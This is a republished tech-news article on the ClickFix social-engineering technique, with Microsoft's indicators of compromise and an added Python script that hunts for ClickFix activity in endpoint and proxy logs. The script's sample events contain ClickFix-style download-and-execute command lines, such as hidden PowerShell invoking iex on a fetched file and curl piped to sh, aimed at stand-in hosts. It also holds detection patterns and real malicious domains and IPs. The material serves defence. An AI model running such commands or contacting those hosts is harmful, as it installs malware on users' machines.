
ClickFix is Compromising Thousands of Devices Daily – Red Flags to Watch – Source: www.techrepublic.com


Source: www.techrepublic.com – Author: J.R. Johnivan

We may earn from vendors via affiliate links or sponsorships. This might affect product placement on our site, but not the content of our reviews. See our Terms of Use for details.

Hackers are using ClickFix, a social engineering technique that has spread rapidly since early 2024, to trick users into running malicious payloads on their own devices around the globe.

Social engineering on a hexagonal design pointed by a man.
Image: iStockphoto/BeeBright

Attackers using the ClickFix technique are compromising thousands of users and devices each day. Rather than exploiting a software flaw, the technique relies on social engineering to get users to launch malware on their own systems.

ClickFix relies on users trying to fix what looks like a minor technical problem, typically by following on-screen instructions to paste a command into the Windows Run dialog, a PowerShell or cmd window, or the macOS Terminal and press Enter. The lure page usually places that command on the clipboard itself, so the "fix" the user performs is exactly the action the cybercriminal wants.

A recent post by Microsoft Threat Intelligence reads, in part: “Over the past year, Microsoft Threat Intelligence and Microsoft Defender Experts have observed the ClickFix social engineering technique growing in popularity, with campaigns targeting thousands of enterprise and end-user devices globally every day. Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware. These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.”

Executing malicious commands

ClickFix works by tricking users into executing malicious commands on their own devices. The lure is commonly a fake error message that offers a one-step fix, or a fake CAPTCHA that asks the user to prove they are human by running a "verification" command. Because the user carries out familiar-looking steps in a legitimate tool, even tech-savvy users may not recognize the threat.

Once the pasted command runs, it downloads and launches a malicious payload on the now-compromised device. Malware delivered through ClickFix has included:

  • Infostealers, including Lumma Stealer.
  • Various remote access tools (RATs), including AsyncRAT, SectopRAT, and Xworm.
  • Other malware loaders, including MintsLoader and Latrodectus.
  • System rootkits, including a customized version of r77.

Because the command is typed or pasted by a logged-on user into a legitimate, signed interpreter, ClickFix sidesteps controls that are built to stop remote command execution or inbound attacks: nothing is exploited, and the initial command arrives through the user rather than over the network. This makes the technique a concern for corporations, enterprises, and small businesses alike.

Recognizing indicators of compromise

Microsoft has published indicators of compromise (IOCs) from the ClickFix campaigns it observed. These red flags include the following domains, URLs, and IP addresses, which defenders can match against proxy, DNS, and endpoint logs:

  • Domains: mein-lonos-cloude.de, derk-meru.online, tesra.ship, cqsf.live, access-ssa-gov.es, binancepizza.info, and panel-spectrum.net.
  • URLs: access-ssa-gov.es/ClientSetup.exe, applemacios.com/vv/install/sh, applemacios.com/m/vv/update, guildmerger.co/verify/eminem, and files.catbox.moe/snenal.bat.
  • IP addresses: 185.234.72.186, 45.94.31.176, 3.138.123.13, 16.171.23.221, 3.23.103.13, 83.242.96.159, and 5.8.9.77.
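The two sections above describe the behaviour (a user-launched interpreter fetching and running remote content) and the network indicators. The script below is an added example, not code from the TechRepublic article or from Microsoft, that turns both into hunts a SOC could run over endpoint and proxy telemetry. The event layouts, field names, process names in INTERPRETERS and USER_LAUNCHERS, scoring threshold, and every sample event are constructed for the example; only the indicator values are copied from the article. Note that a listed URL on a shared host (files.catbox.moe) must match on the full path, not the domain, or the hunt will flag every user of that service.

```python
"""Added example (not the article's or Microsoft's code): two ClickFix hunts
over constructed sample telemetry.

  flag_clickfix_commands(): a user-launched interpreter whose command line
  fetches and runs remote content, often with hidden-window / bypass flags and
  a CAPTCHA-style decoy comment pasted along with it.
  match_iocs(): domain/subdomain, URL and IP matches against the article's IOCs.
"""
import re
from urllib.parse import urlparse

# Indicators reproduced from the article (unchanged, not extended).
IOC_DOMAINS = {
    "mein-lonos-cloude.de", "derk-meru.online", "tesra.ship", "cqsf.live",
    "access-ssa-gov.es", "binancepizza.info", "panel-spectrum.net",
}
IOC_URLS = {
    "access-ssa-gov.es/ClientSetup.exe", "applemacios.com/vv/install/sh",
    "applemacios.com/m/vv/update", "guildmerger.co/verify/eminem",
    "files.catbox.moe/snenal.bat",
}
IOC_IPS = {
    "185.234.72.186", "45.94.31.176", "3.138.123.13", "16.171.23.221",
    "3.23.103.13", "83.242.96.159", "5.8.9.77",
}

# Assumed names: interpreters a lure asks the user to paste into, and parents
# that show a human launched them (the Windows Run dialog spawns from explorer.exe).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "bash", "sh", "zsh", "curl"}
USER_LAUNCHERS = {"explorer.exe", "terminal", "iterm2"}

# Each matching signal adds one point; a user launch adds one more.
SIGNALS = [
    ("remote_fetch", re.compile(
        r"https?://|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b"
        r"|Net\.WebClient|\bcurl\b|\bwget\b", re.I)),
    ("in_memory_exec", re.compile(
        r"\biex\b|Invoke-Expression|\|\s*(ba)?sh\b|\bmshta\b", re.I)),
    ("evasion_flags", re.compile(
        r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-e(xecution)?p(olicy)?\s+bypass"
        r"|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("captcha_decoy", re.compile(r"not a robot|verification id|captcha", re.I)),
]

# Constructed process-creation events (Sysmon-like: parent, image, command line).
SAMPLE_PROCESS_EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",   # Run-dialog lure
     "cmd": 'powershell -w hidden -nop -ep bypass -c "iex (iwr https://example.invalid/v.txt)"'
            ' # I am not a robot - Verification ID: 7731'},
    {"id": 2, "parent": "terminal", "image": "bash",                 # macOS Terminal lure
     "cmd": 'bash -c "curl -fsSL https://example.invalid/update | sh"'},
    {"id": 3, "parent": "explorer.exe", "image": "mshta.exe",        # remote HTA
     "cmd": "mshta http://example.invalid/verify/page"},
    {"id": 4, "parent": "explorer.exe", "image": "powershell.exe",   # benign admin use
     "cmd": "powershell Get-Service -Name Spooler"},
    {"id": 5, "parent": "ccmexec.exe", "image": "powershell.exe",    # deployment tool
     "cmd": "powershell -ExecutionPolicy Bypass -File C:\\deploy\\install.ps1"},
]

# Constructed proxy/DNS events; url is None for DNS-only records.
SAMPLE_NETWORK_EVENTS = [
    {"id": 10, "host": "cdn.mein-lonos-cloude.de", "url": None},
    {"id": 11, "host": "files.catbox.moe", "url": "https://files.catbox.moe/snenal.bat"},
    {"id": 12, "host": "files.catbox.moe", "url": "https://files.catbox.moe/other.png"},
    {"id": 13, "host": "3.23.103.13", "url": "http://3.23.103.13/"},
    {"id": 14, "host": "www.microsoft.com", "url": "https://www.microsoft.com/"},
]


def score_event(ev):
    """Return the names of the signals one process-creation event matches."""
    if ev["image"].lower() not in INTERPRETERS:
        return []
    reasons = ["user_launched"] if ev["parent"].lower() in USER_LAUNCHERS else []
    reasons += [name for name, rx in SIGNALS if rx.search(ev["cmd"])]
    return reasons


def flag_clickfix_commands(events, threshold=3):
    """Return [(event_id, reasons)] for events with at least `threshold` signals."""
    return [(ev["id"], r) for ev in events if len(r := score_event(ev)) >= threshold]


def match_iocs(ev):
    """Return [(kind, indicator)] hits for one proxy/DNS event."""
    hits = []
    host = ev["host"].lower().rstrip(".")
    if host in IOC_IPS:
        hits.append(("ip", host))
    for d in IOC_DOMAINS:                       # subdomains of a listed domain count
        if host == d or host.endswith("." + d):
            hits.append(("domain", d))
    if ev["url"]:
        p = urlparse(ev["url"])
        key = (p.hostname or "").lower() + p.path   # scheme-less, like the article's list
        if key in IOC_URLS:
            hits.append(("url", key))
    return hits


def flag_network_events(events):
    """Return [(event_id, hits)] for events that match at least one indicator."""
    return [(ev["id"], h) for ev in events if (h := match_iocs(ev))]


if __name__ == "__main__":
    for eid, reasons in flag_clickfix_commands(SAMPLE_PROCESS_EVENTS):
        print(f"process event {eid}: {', '.join(reasons)}")
    for eid, hits in flag_network_events(SAMPLE_NETWORK_EVENTS):
        print(f"network event {eid}: {hits}")
```

On the constructed samples the behavioural hunt flags events 1 to 3 and leaves the interactive `Get-Service` call and the deployment tool's `-ExecutionPolicy Bypass` alone, because each of those carries only one signal; the IOC hunt flags the subdomain, the exact catbox URL and the IP, but not the unrelated catbox download. In production the same logic would read Sysmon event 1 / macOS ESF process records and proxy logs instead of the inline lists, and the threshold and signal list would be tuned against the environment's own baseline.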

Microsoft Defender Antivirus detects the payloads and components used in ClickFix campaigns as known malware, and Microsoft Defender for Endpoint and Microsoft Security Copilot surface alerts tied to the technique.

Defending against social engineering

Microsoft advises organizations and individuals to take a proactive approach to cybersecurity. Installing updates, enabling built-in protections, and educating users about social engineering threats are critical defenses. In the case of ClickFix, it’s crucial that users are educated on the threat of social engineering before they become victims themselves.



Original Post URL: https://www.techrepublic.com/article/news-clickfix-attack-chain/

Category & Tags: International, Microsoft, News, Security

